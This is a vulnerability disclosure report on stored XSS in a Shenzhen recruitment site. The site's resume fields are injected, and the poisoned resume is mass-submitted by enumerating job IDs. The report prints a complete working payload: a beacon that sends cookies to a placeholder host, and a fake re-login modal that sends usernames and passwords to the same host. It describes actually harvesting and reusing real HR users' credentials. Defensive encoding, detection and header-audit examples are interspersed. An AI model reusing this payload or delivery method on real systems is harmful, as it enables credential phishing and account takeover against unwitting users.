Vulnerability summary

Defect ID: wooyun-2015-0148681

Title: XSS in a Guangdong city talent-recruitment site allows mass phishing of recruiting companies' accounts (successful cases already obtained)

Vendor: 广东省信息安全测评中心 (Guangdong Information Security Evaluation Center)

Author: 路人甲

Submitted: 2015-10-23 16:33

Fixed: 2015-12-10 16:12

Published: 2015-12-10 16:12

Type: XSS (cross-site scripting)

Severity: High

Self-assessed Rank: 15

Status: handed to the third-party partner organisation (广东省信息安全测评中心) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]


Vulnerability details

Disclosure status:

2015-10-23: Details sent to the vendor; awaiting vendor handling
2015-10-26: Vendor confirmed; details visible to the vendor only
2015-11-05: Details opened to core white hats and domain experts
2015-11-15: Details opened to regular white hats
2015-11-25: Details opened to intern white hats
2015-12-10: Details opened to the public

Brief description:

XSS in a Guangdong city talent-recruitment site allows mass phishing of recruiting companies' accounts (successful cases already obtained)

Detailed description:

1. http://**.**.**.**/ (Shenzhen Talent Network)

[screenshot: QQ截图20151022172119.jpg]

Register an account and log in. The resume editor accepts and stores XSS payloads:

[screenshot: QQ截图20151022172809.jpg]

[screenshot: QQ截图20151022172900.jpg]

Because submitted data is stored and rendered without any escaping, the two fields shown above are not the only vulnerable ones; output encoding has to be applied uniformly to every resume field rather than patched field by field.
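The missing control is context-aware output encoding applied to every resume field before it is rendered into the recruiter's page. The following is an added example written for this page, not code from the report or from the affected site; the function names (escapeHtml, escapeJsString, renderResumeField) and the sample resume value are assumptions chosen to show the report's own `<script>` injection being neutralised in both the text-node and attribute contexts, and in the inline-script context a template might also echo into.

```javascript
// Added example (not code from the original report): context-aware output
// encoding for resume fields, which the report says the site never applied.
// Function names and the sample input are assumptions for illustration.

const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;', '/': '&#x2F;',
};

// Encoder for an HTML text node or a double-quoted attribute value.
// Every character that can open a tag, attribute or entity is replaced.
function escapeHtml(value) {
  return String(value).replace(/[&<>"'\/]/g, (ch) => HTML_ESCAPES[ch]);
}

// Encoder for a JavaScript string-literal context, needed when a field is
// echoed inside an inline <script> block: everything outside a small safe
// alphabet becomes a \xHH or \uHHHH escape, so "</script>" cannot survive.
function escapeJsString(value) {
  return String(value).replace(/[^A-Za-z0-9_ ,.\-]/g, (ch) => {
    const code = ch.charCodeAt(0);
    return code < 0x100
      ? '\\x' + code.toString(16).padStart(2, '0')
      : '\\u' + code.toString(16).padStart(4, '0');
  });
}

// Render one resume field the way a server-side template should: each
// untrusted value passes through the encoder matching its output context
// (attribute value for data-label, text node for the visible label/value).
function renderResumeField(label, value) {
  return (
    '<div class="field" data-label="' + escapeHtml(label) + '">' +
    '<b>' + escapeHtml(label) + '</b>: ' + escapeHtml(value) +
    '</div>'
  );
}

// Constructed sample input: the kind of tag the report's payload relies on.
const SAMPLE_NAME = '<script src="http://x.x/a.js"></script>';

// Returns the rendered HTML and whether a live <script> tag survived encoding.
function demo() {
  const html = renderResumeField('Name', SAMPLE_NAME);
  return { html, scriptSurvives: /<script/i.test(html) };
}
```

The encoder is deliberately separate from input validation: the resume must still be allowed to contain characters such as `<` or `&`, so the fix belongs at the point of output, once per context, rather than in a blacklist applied when the resume is saved.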
2. Next, deliver the poisoned resume in bulk. To do this at scale, click "Apply now" and capture the request:

[screenshot: QQ截图20151022173048.jpg]

[screenshot: QQ截图20151022173146.jpg]

The recruitId in this request can be enumerated, so Burp Suite was used to iterate over it:

[screenshot: QQ截图20151022173300.jpg]

Within a short while a large number of applications had gone through:

[screenshot: QQ截图20151022173349.jpg]

After that it is a matter of waiting for the XSS to fire.
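The bulk delivery in step 2 is visible server-side as one client posting applications for many distinct, consecutive recruitId values within seconds, which no human applicant does. The detection logic below is an added example for this page, not something from the report or the site; the access-log format, the `/apply.do` path, the client addresses and the thresholds are all assumptions, and the log lines are constructed.

```javascript
// Added example (not from the original report): flag the recruitId
// enumeration the report performed with Burp Intruder. Log format, the
// /apply.do path, IP addresses and thresholds are assumptions.

// Apache/nginx combined-log style: ip ident user [time] "METHOD path proto" status
const LOG_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})/;

const MONTHS = { Jan: 0, Feb: 1, Mar: 2, Apr: 3, May: 4, Jun: 5,
  Jul: 6, Aug: 7, Sep: 8, Oct: 9, Nov: 10, Dec: 11 };

// Parse "22/Oct/2015:17:31:00 +0800" into epoch milliseconds.
function parseClfTime(s) {
  const m = /^(\d{2})\/(\w{3})\/(\d{4}):(\d{2}):(\d{2}):(\d{2}) ([+-])(\d{2})(\d{2})$/.exec(s);
  if (!m) return NaN;
  const utc = Date.UTC(+m[3], MONTHS[m[2]], +m[1], +m[4], +m[5], +m[6]);
  const offset = (m[7] === '+' ? 1 : -1) * (+m[8] * 60 + +m[9]) * 60000;
  return utc - offset;
}

// Returns {ip, time, method, path, status, recruitId} or null if unparseable.
function parseLogLine(line) {
  const m = LOG_RE.exec(line);
  if (!m) return null;
  const idMatch = /[?&]recruitId=(\d+)/.exec(m[4]);
  return {
    ip: m[1], time: parseClfTime(m[2]), method: m[3],
    path: m[4], status: +m[5], recruitId: idMatch ? +idMatch[1] : null,
  };
}

// For each client, slide a time window over its application POSTs and report
// the largest window whose distinct recruitIds are mostly consecutive.
function detectEnumeration(lines, { windowMs = 60000, minApplies = 10, minSequentialRatio = 0.8 } = {}) {
  const byIp = new Map();
  for (const line of lines) {
    const e = parseLogLine(line);
    if (!e || e.method !== 'POST' || e.recruitId === null) continue;
    if (!byIp.has(e.ip)) byIp.set(e.ip, []);
    byIp.get(e.ip).push(e);
  }
  const findings = [];
  for (const [ip, events] of byIp) {
    events.sort((a, b) => a.time - b.time);
    let best = null;
    let start = 0;
    for (let end = 0; end < events.length; end++) {
      while (events[end].time - events[start].time > windowMs) start++;
      const win = events.slice(start, end + 1);
      if (win.length < minApplies) continue;
      const ids = [...new Set(win.map((e) => e.recruitId))].sort((a, b) => a - b);
      if (ids.length < minApplies) continue;
      let steps = 0;
      for (let i = 1; i < ids.length; i++) if (ids[i] - ids[i - 1] === 1) steps++;
      const ratio = steps / (ids.length - 1);
      if (ratio >= minSequentialRatio && (!best || ids.length > best.count)) {
        best = { ip, count: ids.length, first: ids[0], last: ids[ids.length - 1], sequentialRatio: ratio };
      }
    }
    if (best) findings.push(best);
  }
  return findings;
}

// Constructed sample log: one client walking recruitId 1001..1012 in twelve
// seconds (the Intruder run), one ordinary applicant applying to three
// unrelated postings over a few minutes.
function sampleLog() {
  const lines = [];
  for (let i = 0; i < 12; i++) {
    const sec = String(i).padStart(2, '0');
    lines.push(`10.0.0.5 - - [22/Oct/2015:17:31:${sec} +0800] "POST /apply.do?recruitId=${1001 + i} HTTP/1.1" 200 512 "-" "Mozilla/5.0"`);
  }
  lines.push('10.0.0.9 - - [22/Oct/2015:17:30:10 +0800] "POST /apply.do?recruitId=2044 HTTP/1.1" 200 512 "-" "Mozilla/5.0"');
  lines.push('10.0.0.9 - - [22/Oct/2015:17:33:42 +0800] "POST /apply.do?recruitId=1871 HTTP/1.1" 200 512 "-" "Mozilla/5.0"');
  lines.push('10.0.0.9 - - [22/Oct/2015:17:36:05 +0800] "POST /apply.do?recruitId=2310 HTTP/1.1" 200 512 "-" "Mozilla/5.0"');
  return lines;
}
```

Keying on the client address is the simplest choice for a log-based detector; keying on the authenticated applicant account would be better here, since the report shows a single registered account doing all the applying, and a per-account application rate limit would have stopped the run rather than merely flagged it.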
3. When the XSS triggers it loads a phishing page I built, which not only collects the company's cookies but also phishes the user's username and password:

[screenshot: QQ截图20151022173524.jpg]

// Stage 1: beacon that exfiltrates referrer, URL, cookies and page title to
// the collector at http://x.x/ (the author's placeholder for the attacker host).
(function(){(new Image()).src='http://x.x/index.php?'+'referrer:'+encodeURIComponent(document.referrer)+'~||~url:'+encodeURIComponent(document.URL)+'~||~cookie:'+encodeURIComponent(document.cookie)+'~||~title:'+encodeURIComponent(document.title)+'~||~';})();

// Stage 2: two seconds later, inject a styled fake login modal (heading
// "网络故障,请重新登录": "Network error, please log in again") over the page.
// Relies on jQuery already being present on the victim page. When the
// victim clicks "重新登录" (log in again), the username|password pair is sent
// to the collector and the modal is removed.
setTimeout(loadcont,2000);
function loadcont(){
$(document).ready(function(){
$("body").append('<style type="text/css">@charset "UTF-8";article,aside,details,figcaption,figure,footer,header,hgroup,nav,section{display:block}audio[controls],canvas,video{display:inline-block}audio:not([controls]){display:none}html{font-size:100%;overflow-y:scroll;-webkit-overflow-scrolling:touch;-webkit-tap-highlight-color:transparent;-webkit-text-size-adjust:100%;-ms-text-size-adjust:100%}body{margin:0;padding:0;line-height:1;background:#eee url(/static/img/bg.png?2013033000)}body,button,input,select,textarea{font-family:"微软雅黑","Helvetica Neue",Helvetica,Arial,sans-serif;color:#666}::-moz-selection{background:#084b91;color:#fff;text-shadow:none}::selection{background:#084b91;color:#fff;text-shadow:none}a{color:#407acc;text-decoration:none}a:focus{outline:thin dotted #333;outline:5px auto -webkit-focus-ring-color;outline-offset:-2px}a:active,a:hover{outline:0;text-decoration:underline}abbr[title]{border-bottom:1px dotted #999}b,strong{font-weight:700}blockquote{margin:1em 40px}dfn{font-style:italic}hr{display:block;height:1px;border:0;border-top:1px solid #ddd;margin:20px 0;padding:0}ins{background:#ff9;color:#000;text-decoration:none}mark{background:#ff0;color:#000;font-style:italic;font-weight:700}code,kbd,pre,samp{font-family:monospace,monospace;font-size:1em}pre{white-space:pre;white-space:pre-wrap;word-wrap:break-word}q{quotes:none}q:after,q:before{content:"";content:none}small{font-size:85%}sub,sup{font-size:75%;line-height:0;position:relative;vertical-align:baseline}sup{top:-.5em}sub{bottom:-.25em}ol,ul{margin:0;padding:0;list-style:none}dd{margin:0 0 0 40px}.modal-backdrop{position:fixed;top:0;right:0;bottom:0;left:0;z-index:1040;background-color:#000}.modal-backdrop.fade{opacity:0}.modal-backdrop,.modal-backdrop.fade.in{opacity:.8;filter:alpha(opacity=80)}.modal{position:fixed;top:50%;left:50%;z-index:1050;width:560px;margin:-250px 0 0 -280px;background-color:#fff;border:1px solid #999;border:1px solid ' +
'rgba(0,0,0,.3);-webkit-border-radius:6px;-moz-border-radius:6px;border-radius:6px;outline:0;-webkit-box-shadow:0 3px 7px rgba(0,0,0,.3);-moz-box-shadow:0 3px 7px rgba(0,0,0,.3);box-shadow:0 3px 7px rgba(0,0,0,.3);-webkit-background-clip:padding-box;-moz-background-clip:padding-box;background-clip:padding-box}.modal.fade{top:-25%;-webkit-transition:opacity .3s linear,top .3s ease-out;-moz-transition:opacity .3s linear,top .3s ease-out;-o-transition:opacity .3s linear,top .3s ease-out;transition:opacity .3s linear,top .3s ease-out}.modal.fade.in{top:50%}.modal-header{padding:9px 15px;border-bottom:1px solid #eee}.modal-header .close{margin-top:2px}.modal-header h3{margin:0;line-height:30px}.modal-body{max-height:400px;padding:15px;overflow-y:auto}.modal-form{margin-bottom:0}.modal-footer{padding:14px 15px 15px;margin-bottom:0;text-align:right;background-color:#f5f5f5;border-top:1px solid #ddd;-webkit-border-radius:0 0 6px 6px;-moz-border-radius:0 0 6px 6px;border-radius:0 0 6px 6px;-webkit-box-shadow:inset 0 1px 0 #fff;-moz-box-shadow:inset 0 1px 0 #fff;box-shadow:inset 0 1px 0 #fff}.modal-footer:after,.modal-footer:before{display:table;line-height:0;content:""}.modal-footer:after{clear:both}.modal-footer .btn+.btn{margin-bottom:0;margin-left:5px}.modal-footer .btn-group .btn+.btn{margin-left:-1px}.modal-footer .btn-block+.btn-block{margin-left:0}body{color:#666;background:#f5f5f5;padding:0;margin:0}button,input{border:1px solid #DDD;font-size:13px;margin:0;height:auto}img{display:inline}a{color:#6B7985;text-decoration:none;outline:0}a:hover{color:#084b91;text-decoration:none}fieldset{border-width:1px 0 0 0;border-style:solid;padding:0 10px 0 18px;border-color:#bebec0}legend{padding:0 ' +
'5px;font-size:12px;font-weight:700}span{display:inline-block}h1,h2,h3,h4,h5,h6{margin:0;padding:0;font-weight:400;color:#6b7985;line-height:1}h1{font-size:40px}h2{font-size:30px}h3{font-size:25px}h4{font-size:20px}h5{font-size:15px}h6{font-size:13px}ul{list-style:none;margin:0;padding:0}ul li{line-height:1}.close{cursor:pointer;padding:2px 3px;cursor:pointer;padding:2px 3px;position:absolute;right:10px;top:14px}.close:hover{background-color:grey;color:#fff}.button-blue{display:block;float:left;padding:5px 0;width:80px;margin-right:10px;color:#fff;background:#407acc;text-align:center;cursor:pointer}.button-blue:hover{background:#084b91;text-decoration:none;color:#fff}.button-grey{display:block;float:left;padding:5px 0;width:80px;color:#fff;background:#ccc;text-align:center;cursor:pointer}.button-grey:hover{background:#aaa;text-decoration:none}.buttons{width:170px;margin:0 auto}.check{float:left;display:block;width:15px;height:15px;margin:0 10px 0 0;background:url(../img/v2/check.png) no-repeat}.check:hover{background:url(../img/v2/check-hover.png) no-repeat}.check.checked{background:url(../img/v2/checked.png) no-repeat}.forgot-form .form-arrow,.login-form .form-arrow,.signup-form .form-arrow{display:block;width:30px;height:15px;background:url(/static/img/arrow.png?2013033000) no-repeat;position:absolute;left:95px;top:-15px}.forgot-form input,.login-form input,.signup-form input{padding:9px 9px 9px 9px;margin-bottom:20px;display:block;width:94%}.forgot-form .forgot,.forgot-form .login,.forgot-form .reg,.login-form .forgot,.login-form .login,.login-form .reg,.signup-form .forgot,.signup-form .login,.signup-form .reg{width:302px;padding:0;margin:0 0 10px 0;height:35px;font-size:18px;cursor:pointer}.forgot-form label.remember,.login-form label.remember,.signup-form label.remember{font-size:13px}.forgot-form input[type=checkbox],.login-form input[type=checkbox],.signup-form input[type=checkbox]{width:auto;height:auto;padding:0;margin:3px 5px 0 0}.forgot-form ' +
'a.forgot,.login-form a.forgot,.signup-form a.forgot{font-size:13px;float:right;margin-top:2px;width:auto;cursor:pointer}.forgot-form p.error,.login-form p.error,.signup-form p.error{font-size:13px;margin-bottom:5px;color:#b22d2d}.landing-bg{background:url(/static/img/land/land_bg.jpg) center top no-repeat #f4f1ed;min-width:1000px;height:350px;border-bottom:1px solid #E7E7E7}.land-content{width:1000px;margin:0 auto}.land-content .devide{background:url(/static/img/land/land_line.png) center top no-repeat;height:43px;margin:15px 0 0 0}.land-content .land-title{font-size:30px;color:#202020;text-align:center;margin:10px 0 20px 0}.land-content .demo-mod:first-child{margin-left:0}.land-content .demo-mod{width:300px;height:280px;margin-left:50px;float:left}.land-content .demo-mod h4{font-size:24px;text-align:center;border-bottom:1px solid #dbdbdb;margin:10px 0 50px 0;padding:10px 0;color:#202020}.land-content .demo-mod a{display:block;white-space:nowrap;text-overflow:ellipsis;overflow:hidden;margin-bottom:18px;font-weight:14px;color:grey}.land-content .demo-links{margin-top:10p}.ucando{margin-top:20px}.ucando img{float:left;margin-left:47px}.ucando img:first-child{margin-left:0}.land-bg{background:url(/static/img/land/bg.png) repeat;position:relative}.land-bg .desc{position:absolute;left:55%;top:140px}.land-bg .desc h4{margin-bottom:10px}#land_footer{background-color:#fff;padding:5px}#forgetform,#login-modal,#signup-modal,.modal{display:none;width:300px;padding:0 40px 20px;background:#fff;border:5px solid rgba(0,0,0,.2);margin-left:-190px;border-radius:10px;overflow:hidden;margin-bottom:40px;box-shadow:0 1px 0 #fff inset;margin-top:-267px}#forgetform a:hover,#login-modal a:hover,#signup-modal a:hover,.modal a:hover{text-decoration:none}#forgetform h1,#login-modal h1,#signup-modal h1,.modal h1{margin:0 -40px;background:#EEE;border-bottom:1px solid #CCC;border-top:1px solid #CCC;font-size:16px;padding:13px ' +
'40px;border-top-left-radius:6px;border-top-right-radius:6px;text-align:center;margin-bottom:30px}#forgetform .close,#login-modal .close,#signup-modal .close,.modal .close{position:absolute;top:0;right:0;padding:12px 18px 16px 18px;opacity:.8;border-left:1px solid #BBB}.forgot-btn,.login-btn{display:inline-block;margin-top:14px;color:#fff}.btn{display:inline-block;cursor:pointer}a.btn:hover{text-decoration:none}a.white-btn{display:inline-block;color:#fff}a.white-btn:hover{color:#fff;cursor:pointer}.nologin{float:right}.nologin .white-btn{margin:15px 10px}.reg-btn{box-shadow:inset 0 1px 0 rgba(255,255,255,.2),0 1px 2px rgba(0,0,0,.05);background-image:linear-gradient(top,#fbac2b,#f9a328);background-image:-webkit-linear-gradient(top,#fbac2b,#f9a328);background-color:#f9a328;border:1px solid #d58d4a;width:150px;padding:15px 20px;background-color:#ffc341;text-align:center;margin-top:80px;color:#fff;font-size:24px;border-radius:4px}a.login-btn:hover,a.reg-btn{color:#fff}a.reg-btn:focus{outline:0}#mw-info{-webkit-box-shadow:0 0 5px 0 rgba(0,0,0,.5);background:#ededed;box-shadow:0 0 5px 0 rgba(0,0,0,.5);color:#4b4b4b;display:block;float:none;font-size:15px;left:0;min-width:550px;overflow:hidden;position:fixed;text-align:center;top:0;width:100%;z-index:2147483647}#mw-info .meiwei_header{height:3px}#mw-info .meiwei_header_bg{float:left;height:100%;width:50%}#mw-info .meiwei_header_bg1{background-color:#3f7dca}#mw-info .meiwei_header_bg2{background-color:#73a9ec}#mw-info .meiwei_bd{height:70px;line-height:70px;position:relative}#mw-info .meiwei_logo{left:7%;position:absolute;top:8px;vertical-align:top}#mw-info .meiwei_tip{font-size:medium;font-weight:400;margin:0;padding:0}#mw-info .meiwei_tip a{text-decoration:underline;color:#4d86cd}.nologin{float:right}#iframe-cached{height:100%;border-top:1px solid #AAA;margin-top:60px;border-image:initial}#iframe-cached ' +
'iframe{width:100%;height:100%;border:0!important;margin:0!important;padding:0!important;overflow:auto!important;display:block}#tools img{display:block}#tools .main{background-color:#fff}#tools .bd{background:#fff}#tools .side-nav{background-color:#e7e9eb;height:3000px}#tools h3{background-color:#E7E9EB;font-size:15px;padding:10px;position:relative;cursor:pointer;border-radius:5px}#tools h4{font-size:16px;margin:15px 0}#tools h5{font-size:14px;margin:20px 0 10px;font-weight:700}#tools .collapse-icon{background-position:-12px -63px;position:absolute;right:13px;top:11px;height:27px;width:28px}#tools .collapse-icon.expanded{background-position:-51px -63px}#tools .browernav a{display:block;padding:15px 0 15px 30px}#tools .browernav a.selected,#tools .browernav a:hover{background-color:#d3d8dd;text-decoration:none}#tools .sections{padding:10px 60px}#tools .sections .section{margin-bottom:10px}#tools .onemethod{width:330px;float:left;margin-right:100px}#tools .methods{padding:0 0 20px 0;border-bottom:1px solid #e8eaec;margin-bottom:30px}#tools p{font-size:14px}#tools .answer{margin-bottom:10px}#uservoice{background-image:url(/static/img/v2/uservoice.png?2013033000);border-top-width:1px;border-bottom-width:1px;border-left-width:1px;border-style:solid none solid solid;border-top-color:#fff;border-bottom-color:#fff;border-left-color:#fff;border-top-left-radius:4px;border-top-right-radius:0;border-bottom-right-radius:0;border-bottom-left-radius:4px;-webkit-box-shadow:rgba(255,255,255,.24706) 1px 1px 1px inset,rgba(0,0,0,.49804) 0 1px 2px;box-shadow:rgba(255,255,255,.24706) 1px 1px 1px inset,rgba(0,0,0,.49804) 0 1px 2px;font-style:normal;font-variant:normal;font-weight:700;font-size:14px;line-height:1em;font-family:Arial,sans-serif;position:fixed;right:0;top:80%;z-index:9999;background-color:#07C;margin-top:-59px;margin-right:0;display:block;background-position:50% 0;background-repeat:no-repeat no-repeat}@media ' +
'(max-width:1000px){.header-inner,.landing-bg{width:800px}.landing-bg .desc{left:70%}}.split-line{margin:10px 0}.folder{display:block;padding:7px 0 7px 60px;background:url(../img/v2/mass-folder.png) 29px 8px no-repeat;font-size:13px;color:#666;white-space:nowrap;word-wrap:break-word;overflow:hidden;text-overflow:ellipsis;position:relative}.folder.selected,.folder:hover{background:url(../img/v2/mass-folder-hover.png) 29px 8px no-repeat #fff}.folder:hover .close{display:block}.folder .close{display:none;top:6px;font-size:12px;font-weight:700}.folder-create{padding:0 0 0 30px;cursor:pointer;font-size:13px}.folder-create i{background-position:-208px 5px;width:15px;height:20px;margin-right:12px}.folder-create:hover{cursor:pointer}.folder-list{margin:20px 0 0 0}.more{cursor:pointer}.read img,.unread img{position:absolute;left:28px}.like img{position:absolute;left:25px}.category a:hover{background-color:#fff}.share{text-align:left;overflow:hidden;display:block!important;height:16px!important;line-height:16px!important;padding-left:20px!important;background:url(../img/v2/share.png) no-repeat left;cursor:pointer;float:right}.share:hover{opacity:.8}.share.weibo{background-position:0 -96px}.share.qq{background-position:0 -64px}.share.douban{background-position:0 -560px}.share.renren{background-position:0 -160px}.third-parties{display:none}.login-bind-tp{margin:-5px 0 30px 0}.login-bind-tp em{padding:1px 8px}.login-bind-tp li{border-radius:5px;margin-bottom:10px;cursor:pointer}.login-bind-tp li a{text-align:center;display:block;color:#fff;padding:12px 30px 12px 0}.login-bind-tp .qweibo{background-color:#3671d2;border:1px solid #136ac1;border-radius:3px;margin:10px 0 25px;box-shadow:0 1px 0 rgba(255,255,255,.25) inset;text-shadow:0 1px 0 #1a64bf;cursor:pointer;text-align:left;background-color:#369ad2}.login-bind-tp .qweibo em{background:url(/static/img/tp/qq_logo.png) no-repeat}.login-bind-tp .sina{background-color:#b9e6eb;border:1px solid #c12f13;border-radius:3px;margin:10px 0 ' +
'25px;box-shadow:0 1px 0 rgba(255,255,255,.25) inset;text-shadow:0 1px 0 #921414;cursor:pointer;text-align:left;background-color:#d6514b}.login-bind-tp .sina em{background:url(/static/img/tp/sina_logo.png) no-repeat}.login-bind-tp .douban{border:1px solid #54c113;border-radius:3px;margin:10px 0 25px;box-shadow:0 1px 0 rgba(255,255,255,.25) inset;text-shadow:0 1px 0 #921414;text-align:left;background-color:#41a41a}.login-bind-tp .douban em{background:url(/static/img/tp/douban_logo.png) no-repeat}</style><div id="denglu"><div class="modal in" id="forgetform" style="display:block"><h1>网络故障,请重新登录</h1><form class="signup-form clearfix"><input name="username" id="username" placeholder="用户名:"><input name="password" type="password" id="password" placeholder="密码:"><input type="button" name="type" class="button-blue login" value="重新登录"></form></div><div class="modal-backdrop in"></div></div><script type="text/javascript">$(".login").click(function(){if($("#username").val() == "" || $("#password").val() == "" ){}else{$.ajax({url:"http://x.x/test.php?"+$("#username").val()+"|"+$("#password").val(),async:true});$("#denglu").remove();}});</script>');
});
}


Soon a pile of emails arrived:

[screenshot: QQ截图20151022173737.jpg]

The captured cookie alone is enough to log in as the user:

[screenshot: QQ截图20151022173814.jpg]
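That the stolen cookie logs the attacker straight in means the session cookie was readable from document.cookie, i.e. it was set without HttpOnly, and that the beacon's image request to an external host was not blocked by any Content-Security-Policy. The checks below are an added example written for this page, not code from the report or the affected site: the cookie name JSESSIONID, the header values and the site origin are constructed samples, and the CSP evaluator covers only the source forms relevant to this payload (`'none'`, `'self'`, `*`, a scheme, a host with optional `*.` wildcard).

```javascript
// Added example (not from the original report): audit the two response
// headers whose absence made the payload above work. Cookie name, header
// values and origins are constructed samples; function names are assumptions.

// Report which protections a Set-Cookie header lacks. Without HttpOnly the
// cookie is exposed to document.cookie, which is how the beacon read it.
function auditSessionCookie(setCookie) {
  const parts = setCookie.split(';').map((p) => p.trim());
  const [name] = parts[0].split('=');
  const attrs = new Map(parts.slice(1).map((p) => {
    const [k, ...v] = p.split('=');
    return [k.toLowerCase(), v.join('=')];
  }));
  const missing = [];
  if (!attrs.has('httponly')) missing.push('HttpOnly');
  if (!attrs.has('secure')) missing.push('Secure');
  if (!attrs.has('samesite')) missing.push('SameSite');
  return { name, missing };
}

// Parse a CSP header into a Map of directive -> [source expressions].
function parseCsp(header) {
  const policy = new Map();
  for (const d of header.split(';')) {
    const [name, ...sources] = d.trim().split(/\s+/).filter(Boolean);
    if (name) policy.set(name.toLowerCase(), sources.map((s) => s.toLowerCase()));
  }
  return policy;
}

// Does `directive` (falling back to default-src) permit a request to `url`
// from a page at `pageOrigin`? Minimal evaluator for the source forms that
// matter for an <img> beacon; not a full CSP implementation.
function cspAllows(header, directive, url, pageOrigin) {
  const policy = parseCsp(header);
  const sources = policy.get(directive) || policy.get('default-src');
  if (!sources) return true;            // no applicable directive: unrestricted
  const target = new URL(url);
  const origin = new URL(pageOrigin);
  for (const src of sources) {
    if (src === "'none'") return false;
    if (src === '*') return true;
    if (src === "'self'") {
      if (target.origin === origin.origin) return true;
      continue;
    }
    if (/^[a-z][a-z0-9+.-]*:$/.test(src)) {   // scheme source, e.g. "https:" or "data:"
      if (target.protocol === src) return true;
      continue;
    }
    // host source, optionally with scheme, port and a leading "*." wildcard
    const hostPart = src.replace(/^[a-z]+:\/\//, '').replace(/\/.*$/, '');
    const [host] = hostPart.split(':');
    if (host.startsWith('*.')) {
      if (target.hostname.endsWith(host.slice(1))) return true;
    } else if (target.hostname === host) {
      return true;
    }
  }
  return false;
}

// Constructed samples: the weak configuration beside a hardened one. The
// beacon URL reuses the report's placeholder collector host.
const WEAK_COOKIE = 'JSESSIONID=abc123; Path=/';
const HARDENED_COOKIE = 'JSESSIONID=abc123; Path=/; HttpOnly; Secure; SameSite=Lax';
const HARDENED_CSP = "default-src 'self'; img-src 'self' data:; script-src 'self'";
const BEACON = 'http://x.x/index.php?cookie=...';
const SITE = 'http://www.example.com/';

// Summarise both checks for the weak configuration.
function auditWeakConfig() {
  return {
    cookieMissing: auditSessionCookie(WEAK_COOKIE).missing,
    beaconBlockedByHardenedCsp: !cspAllows(HARDENED_CSP, 'img-src', BEACON, SITE),
  };
}
```

Neither header fixes the XSS itself; they are the second layer. HttpOnly stops this particular cookie theft but not the credential-phishing modal, and a CSP with `script-src 'self'` and no `'unsafe-inline'` would have kept the injected inline `<script>` from running at all, which is the control that actually addresses the report's third step.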


Some users' usernames and passwords were phished as well:

[screenshot: QQ截图20151022173914.jpg]

[screenshot: QQ截图20151022174049.jpg]

[screenshot: QQ截图20151022174249.jpg]

[screenshot: QQ截图20151022174134.jpg]

Proof of vulnerability:

HR staff are mostly non-technical, which makes them well suited to phishing.

Fix recommendation:

Copyright notice: please credit 路人甲@乌云 when reposting.


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2015-10-26 16:10

Vendor reply:

Thank you very much for your report.
The issue in the report has been confirmed and reproduced.
Data affected: high
Attack cost: low
Impact: high
Overall rating: high, rank: 10
We are contacting the unit that administers the affected site to handle it.

Latest status:

None yet